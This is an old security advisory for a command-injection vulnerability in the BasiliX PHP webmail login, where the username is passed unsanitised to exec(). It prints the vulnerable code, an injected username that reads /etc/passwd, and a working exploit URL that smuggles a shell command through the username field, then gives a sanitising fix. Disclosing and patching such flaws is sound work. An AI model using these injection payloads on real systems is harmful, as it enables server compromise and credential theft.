Title 10/9/2001
BasiliX Command Execution Vulnerability (username)
Summary
BasiliX is a webmail application based on PHP and IMAP, and powered with the MySQL database server. A security vulnerability in the product allows attackers to execute arbitrary commands with the security privileges of the running web server.
Details
Vulnerable systems:
BasiliX version 1.0.2/3 (Series)
There is a bug in BasiliX package that allows executing any command on the target system.
Vulnerable code:
From file login.php3 :
$atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
.
.
.
$mkcmd = "/bin/mkdir -p $atch_dir";
@exec($mkcmd);
We can pass evil username such as username=blah;cat%20/etc/passwd but that would fail because the script tries to connect to IMAP server and authenticate with username and password. To pass through this check we must set up a fake IMAP server or something like that. We can pass the address and port of IMAP server, so it is not a problem.
Exploit:
victim.host/basilix.php3?username=blah;echo%20"">js/blah.php&
password=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=blah.com.pl&
bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_tick&nocookie=1&
BSX_TestCookie=1&SESSID=1
(NOTE: The URL has been wrapped for readability)
If you do not write a fake IMAP, you must add username to /etc/passwd and /etc/shadow and set him password.
Solution:
The following is the quick fix of the latest 1.0.2/3 series bug (Thanks to Justin Bruist).
1) Open file files/login.php (or login.php3) with your favorite editor.
2) Search for the comment line starting with "// create and or cleanup.."
3) Add the following lines above the comment.
So it should look like the following:
// cleanup the username to prevent running of shell commands
// on exec() call.
$username = ereg_replace("[^-A-Za-z0-9_\.]", "", $username);
// create and or cleanup attachment directory
4) Save and exit.
(
geocities.com/ijookeren)